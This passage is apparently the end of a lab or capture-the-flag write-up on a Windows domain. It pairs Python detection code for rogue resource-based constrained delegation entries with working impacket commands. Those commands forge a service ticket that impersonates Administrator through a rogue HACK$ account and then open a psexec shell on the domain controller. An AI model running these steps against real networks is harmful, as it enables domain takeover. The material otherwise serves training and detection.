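    # Header: Revision, Sbz1, Control (SE_SELF_RELATIVE | SE_DACL_PRESENT), offsets of owner, group, SACL, DACL
    header = struct.pack("<BBHIIII", 1, 0, 0x8004, 20, 20 + len(owner), 0, 20 + 2 * len(owner))
    return header + owner + owner + acl

def allowed_to_act_sids(descriptor):
    """SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL (empty if no DACL)."""
    _, _, _, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", descriptor, 0)
    if off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", descriptor, pos)
        if ace_type == 0x00:                                  # ACCESS_ALLOWED_ACE_TYPE
            sids.append(bytes_to_sid(descriptor, pos + 8))    # 4-byte ACE header + 4-byte mask
        pos += ace_size
    return sids

def unexpected_delegators(descriptor, approved_sids):
    """Detection: any SID allowed to act on behalf of others that is not on the approved list."""
    return [s for s in allowed_to_act_sids(descriptor) if s not in approved_sids]

# Constructed: the SID a rogue HACK$ account might have (domain part is a placeholder).
ROGUE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1601"
```

Reading the attribute periodically for servers and the DC, and alerting when unexpected_delegators returns anything, catches both writes shown in this writeup.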


Import the ticket:

```bash
proxychains4 impacket-getST xiaorang.lab/HACK\$:orange@admin -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
```

Log in with psexec without a password:

```bash
proxychains4 impacket-psexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -k -no-pass -target-ip 172.22.15.13 -codec gbk
```



Source: https://0ran9ewww.github.io/2025/05/01/渗透/wdb2022/
Author: orange
Published: 1 May 2025
Updated: 2 May 2025